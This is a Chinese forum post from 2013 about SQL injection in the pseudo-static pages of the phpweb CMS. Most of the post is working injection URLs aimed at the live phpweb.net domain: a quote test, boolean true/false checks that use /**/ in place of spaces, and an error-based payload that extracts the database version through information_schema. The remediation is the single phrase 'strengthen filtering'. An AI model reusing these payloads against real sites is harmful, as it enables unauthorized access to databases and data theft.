灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:2463回复:0

phpweb伪静态页面注入及修复

楼主#
更多 发布于:2013-01-05 17:57
phpweb所有的整站程序伪静态页面都存在sql注入

主站:http://phpweb.net/
加’检测:

作者:しovの枫☆☆
http://www.phpweb.net/down/html/?772′.html

出错
存在注入。
不能用空格,只能用/*罗
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常

http://www.atcpu.com /page/html/?56′/**/and/**/1=2/*.html 出错.
爆数据库版本:

http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
更新日期: 2013-01-03 13:39:50

修复方案

加强过滤

喜欢0 评分0
游客

返回顶部